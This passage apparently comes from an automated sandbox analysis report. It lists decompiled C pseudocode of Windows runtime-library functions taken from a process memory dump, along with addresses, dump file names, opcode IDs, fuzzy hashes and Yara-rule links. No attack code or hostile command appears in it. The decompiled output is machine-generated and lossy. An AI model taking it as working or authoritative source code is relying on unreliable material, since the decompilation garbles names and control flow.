				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E049607DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0495AFDE( &_v8,  &_v12);
					E04961293(_t38, _v28, _t60);
					if(E048B7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E049514FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                        0x0496071b
                                                        0x04960724
                                                        0x04960734
                                                        0x04960738
                                                        0x0496074b
                                                        0x0496074b
                                                        0x04960753
                                                        0x04960753
                                                        0x04960759
                                                        0x0496075d
                                                        0x04960774
                                                        0x04960779
                                                        0x0496077d
                                                        0x04960789
                                                        0x04960795
                                                        0x049607a7
                                                        0x04960797
                                                        0x049607a0
                                                        0x049607a0
                                                        0x049607af
                                                        0x049607c4
                                                        0x049607cd
                                                        0x049607cd
                                                        0x049607af
                                                        0x049607dc

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                        • Instruction ID: 779a3acbb9e112ceb73fc410c71f6ad2178c4a40ceee9de948a3b3686ebd60ab
                                                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                        • Instruction Fuzzy Hash: 8521F2362042009FD705DF18CC80B6ABBA9FBC4350F048679F9968B395D630ED09CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048BAE73, Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E048BAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E048B7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E048B7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E048B7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E048B7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04917794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                        0x048bae78
                                                        0x048bae7c
                                                        0x048bae7e
                                                        0x048bae81
                                                        0x048bae86
                                                        0x048bae8d
                                                        0x04902691
                                                        0x048bae93
                                                        0x048bae93
                                                        0x048bae93
                                                        0x048bae98
                                                        0x048bae9d
                                                        0x049026a2
                                                        0x049026b4
                                                        0x049026a4
                                                        0x049026ad
                                                        0x049026ad
                                                        0x049026b9
                                                        0x00000000
                                                        0x049026bb
                                                        0x00000000
                                                        0x049026bb
                                                        0x048baea3
                                                        0x048baea3
                                                        0x048baea3
                                                        0x048baeaa
                                                        0x049026c0
                                                        0x049026c9
                                                        0x049026c9
                                                        0x048baeb3
                                                        0x049026d4
                                                        0x049026e1
                                                        0x00000000
                                                        0x00000000
                                                        0x049026e7
                                                        0x049026ee
                                                        0x049026f0
                                                        0x049026f9
                                                        0x049026f9
                                                        0x04902702
                                                        0x04902708
                                                        0x04902708
                                                        0x0490270b
                                                        0x0490270f
                                                        0x04902711
                                                        0x04902711
                                                        0x04902725
                                                        0x04902725
                                                        0x00000000
                                                        0x048baeb9
                                                        0x048baeb9
                                                        0x048baebf
                                                        0x048baebf
                                                        0x048baeb3

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                        • Instruction ID: 3dd9ff05dafbb35d918c9e00f8a5217fef10c252c7ba669f5937c8fd197ce66f
                                                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                        • Instruction Fuzzy Hash: 7B21F231A016849FEB169B68C948B6537E9AF80344F0909F2DC44CB7A2E774FC40C691
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04917794, Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E04917794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4987b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L048B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E048DF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E048B7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E048D9AE0();
					_t24 = L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                        0x04917799
                                                        0x0491779a
                                                        0x0491779b
                                                        0x049177a3
                                                        0x049177ab
                                                        0x049177ae
                                                        0x049177b1
                                                        0x049177b1
                                                        0x049177bf
                                                        0x049177c4
                                                        0x049177c8
                                                        0x049177ce
                                                        0x049177d4
                                                        0x049177e0
                                                        0x049177e0
                                                        0x049177d6
                                                        0x049177d6
                                                        0x049177de
                                                        0x00000000
                                                        0x00000000
                                                        0x049177de
                                                        0x049177e5
                                                        0x049177f0
                                                        0x049177f3
                                                        0x049177f6
                                                        0x049177fd
                                                        0x04917800
                                                        0x0491780c
                                                        0x04917818
                                                        0x0491782b
                                                        0x0491781a
                                                        0x04917823
                                                        0x04917823
                                                        0x04917830
                                                        0x04917831
                                                        0x04917838
                                                        0x0491783d
                                                        0x0491783e
                                                        0x0491784f
                                                        0x0491784f
                                                        0x0491785a

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47340ed7d6ab5e62612e5d98243eb0d6ab25631955c887f2149dfb82e6a4c97e
                                                        • Instruction ID: c7a3888a2d06d381b70f6e6bd41cca23627c760fcfa23c10ac3e72d3c204f6d6
                                                        • Opcode Fuzzy Hash: 47340ed7d6ab5e62612e5d98243eb0d6ab25631955c887f2149dfb82e6a4c97e
                                                        • Instruction Fuzzy Hash: C6219272501648AFC725DFA9D880EABB7ADEF88740F1006ADE50AC7760E634E900CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CFD9B, Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E048CFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E048A76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L048B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                        0x048cfd9b
                                                        0x048cfda0
                                                        0x048cfda1
                                                        0x048cfdab
                                                        0x048cfdad
                                                        0x048cfdb0
                                                        0x048cfdb8
                                                        0x048cfe0f
                                                        0x048cfde6
                                                        0x048cfde9
                                                        0x048cfdec
                                                        0x0490c0c0
                                                        0x048cfdfe
                                                        0x048cfe06
                                                        0x048cfe06
                                                        0x0490c0c8
                                                        0x048cfe2d
                                                        0x048cfe2d
                                                        0x00000000
                                                        0x048cfe2d
                                                        0x0490c0d1
                                                        0x0490c0e0
                                                        0x0490c0e5
                                                        0x0490c0e5
                                                        0x0490c0e8
                                                        0x00000000
                                                        0x0490c0e8
                                                        0x048cfdf4
                                                        0x00000000
                                                        0x00000000
                                                        0x048cfdf6
                                                        0x048cfdfa
                                                        0x048cfe1a
                                                        0x048cfe1f
                                                        0x048cfe1f
                                                        0x048cfdfc
                                                        0x00000000
                                                        0x048cfdfc
                                                        0x048cfdcc
                                                        0x048cfdd0
                                                        0x048cfe26
                                                        0x00000000
                                                        0x048cfe26
                                                        0x048cfdd8
                                                        0x048cfddb
                                                        0x048cfddd
                                                        0x048cfde0
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                        • Instruction ID: c4a8adb91dd46a0989f3b1d613be777c2710eb08791caeb59c87d2b165678a2c
                                                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                        • Instruction Fuzzy Hash: B5216A72A00645DFE735CF09C540A66B7E6EB94B14F248A7EEB45CB651E730EC00DB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04899240, Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E04899240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x496f708);
				E048ED08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E048D95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E048D95D0();
				_t33 =  *0x49884c4; // 0x0
				L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x49884c4; // 0x0
				L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x49884c4; // 0x0
				E048B2280(L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x49886b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E048D95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E048D95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04899325();
					_t50 =  *0x49884c4; // 0x0
					return E048ED0D1(L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                        0x04899240
                                                        0x04899242
                                                        0x04899247
                                                        0x0489924c
                                                        0x0489924e
                                                        0x04899255
                                                        0x04899257
                                                        0x0489925a
                                                        0x0489925f
                                                        0x0489925f
                                                        0x04899266
                                                        0x04899271
                                                        0x04899276
                                                        0x04899279
                                                        0x0489927e
                                                        0x04899295
                                                        0x0489929a
                                                        0x048992b1
                                                        0x048992b6
                                                        0x048992d7
                                                        0x048992dc
                                                        0x048992e0
                                                        0x048992e6
                                                        0x048992e8
                                                        0x048992ee
                                                        0x04899332
                                                        0x04899333
                                                        0x04899337
                                                        0x04899338
                                                        0x0489933a
                                                        0x0489933a
                                                        0x0489933d
                                                        0x04899342
                                                        0x04899342
                                                        0x04899345
                                                        0x04899349
                                                        0x0489934e
                                                        0x04899352
                                                        0x04899357
                                                        0x048992f4
                                                        0x048992f4
                                                        0x048992f6
                                                        0x048992f9
                                                        0x04899300
                                                        0x04899306
                                                        0x04899324
                                                        0x04899324

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c6995319338070eccd9f6b5f00f05a439d00fcca5772ee86d41505196d1af726
                                                        • Instruction ID: 461f37c697f5c2f2b5e09192ed9300ecfe86529152e6db19cd28024a0a51c5c7
                                                        • Opcode Fuzzy Hash: c6995319338070eccd9f6b5f00f05a439d00fcca5772ee86d41505196d1af726
                                                        • Instruction Fuzzy Hash: 43210572041A40DFD721EF6CCA40B59BBF9EF08708F584A6CE049CA6A1CB74F941DB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CB390, Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E048CB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E048B2280(_t12, 0x4988608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E048D00C2(0x4988608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                        0x048cb395
                                                        0x048cb3a2
                                                        0x048cb3a5
                                                        0x048cb3aa
                                                        0x048cb3b2
                                                        0x048cb3ba
                                                        0x048cb3bd
                                                        0x048cb3c0
                                                        0x048cb3c4
                                                        0x048cb3c9
                                                        0x0490a3e9
                                                        0x0490a3ed
                                                        0x0490a3f0
                                                        0x0490a3ff
                                                        0x0490a403
                                                        0x0490a409
                                                        0x00000000
                                                        0x00000000
                                                        0x0490a40b
                                                        0x0490a40b
                                                        0x0490a40f
                                                        0x0490a415
                                                        0x0490a423
                                                        0x0490a423
                                                        0x0490a415
                                                        0x048cb3d1
                                                        0x048cb3e8
                                                        0x048cb3e8
                                                        0x048cb3d9

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3d65b924a73905e5194c3171bc0103307de6deabe01322aca88dd798818c8bf4
                                                        • Instruction ID: 3b727538748385e99b7a856fc81a20177a4b37873b0f92715f1459960955e863
                                                        • Opcode Fuzzy Hash: 3d65b924a73905e5194c3171bc0103307de6deabe01322aca88dd798818c8bf4
                                                        • Instruction Fuzzy Hash: 161125323116109FDB28EE289D81A6B73DAEBC5234B284A3DD916DB380D931BC02C6D5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924257, Relevance: .1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E04924257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x49708d0);
				E048ED08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E049241E8(__ebx, __edi, __ecx, _t39);
				E048AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x49887e4;
					_t18 =  *0x49887e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4985cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x49887e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x49887e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04897055(_t31 + 0xfffffff8);
								_t24 =  *0x49887e0; // 0x0
								_t18 = _t24 - 1;
								 *0x49887e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4985cd0;
				if( *0x4985cd0 <= 0) {
					L04897055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x49887e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x49887e8 = _t30;
						 *0x49887e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E048ED0D1(L04924320());
			}















                                                        0x04924257
                                                        0x04924257
                                                        0x04924257
                                                        0x04924259
                                                        0x0492425e
                                                        0x04924263
                                                        0x04924265
                                                        0x04924273
                                                        0x04924278
                                                        0x0492427c
                                                        0x0492427f
                                                        0x04924281
                                                        0x04924287
                                                        0x049242d7
                                                        0x049242d7
                                                        0x049242da
                                                        0x0492428d
                                                        0x0492428d
                                                        0x0492428f
                                                        0x04924292
                                                        0x04924297
                                                        0x0492429c
                                                        0x049242a0
                                                        0x049242a6
                                                        0x049242a8
                                                        0x049242ae
                                                        0x049242b3
                                                        0x00000000
                                                        0x049242ba
                                                        0x049242ba
                                                        0x049242bf
                                                        0x049242c5
                                                        0x049242ca
                                                        0x049242cf
                                                        0x049242d0
                                                        0x00000000
                                                        0x049242d0
                                                        0x049242b3
                                                        0x00000000
                                                        0x049242a6
                                                        0x0492429c
                                                        0x049242dc
                                                        0x049242dc
                                                        0x049242e3
                                                        0x04924309
                                                        0x049242e5
                                                        0x049242e5
                                                        0x049242e8
                                                        0x049242ee
                                                        0x049242f0
                                                        0x00000000
                                                        0x049242f2
                                                        0x049242f2
                                                        0x049242f4
                                                        0x049242f7
                                                        0x049242f9
                                                        0x04924300
                                                        0x04924300
                                                        0x049242f0
                                                        0x0492430e
                                                        0x0492431f

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31aaf41d1aaa406ad4a76d73dab4dc6398115ae787c505f4348ceb4779a30fb0
                                                        • Instruction ID: 5452711864a791bfb95363e9dd19b6cd90a7a60e5ea4d1662ca33cf0713c718d
                                                        • Opcode Fuzzy Hash: 31aaf41d1aaa406ad4a76d73dab4dc6398115ae787c505f4348ceb4779a30fb0
                                                        • Instruction Fuzzy Hash: F421AE70501A11DFD714FF6AD600A147BF1FB85718B94867EC105CB698D739E841CF11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049146A7, Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E049146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L048B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E048DF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E048CD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L048B77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                        0x049146b7
                                                        0x049146ba
                                                        0x049146c5
                                                        0x049146c8
                                                        0x049146d0
                                                        0x049146d4
                                                        0x049146e6
                                                        0x049146e9
                                                        0x049146f4
                                                        0x049146ff
                                                        0x04914705
                                                        0x04914706
                                                        0x0491470c
                                                        0x04914713
                                                        0x0491471b
                                                        0x04914723
                                                        0x04914725
                                                        0x049146d6
                                                        0x049146d9
                                                        0x049146db
                                                        0x049146db
                                                        0x04914732

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                        • Instruction ID: 2d4003322270fa48bf69fc52310c427d8b1597f6fca47140447490a2b9e2db4d
                                                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                        • Instruction Fuzzy Hash: 6D112572904208BFD7059F5CD8808BEB7B9EF89304F10816EF984CB350DA71AD51D7A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C2397, Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 34%
                                                        			E048C2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x498848c != 0) {
					L048BFAD0(0x4988610);
					if( *0x498848c == 0) {
						E048BFA00(0x4988610, _t19, _t27, 0x4988610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E048C2581(0x4988610, 0x48750a0, _t26, _t27, _t28);
						E048BFA00(0x4988610, 0x48750a0, _t27, 0x4988610);
					}
				} else {
					L1:
					_t11 =  *0x4988614; // 0x1
					if(_t11 == 0) {
						_t11 = E048D4886(0x4871088, 1, 0x4988614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E048C2581(0x4988610, (_t11 << 4) + 0x4875070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
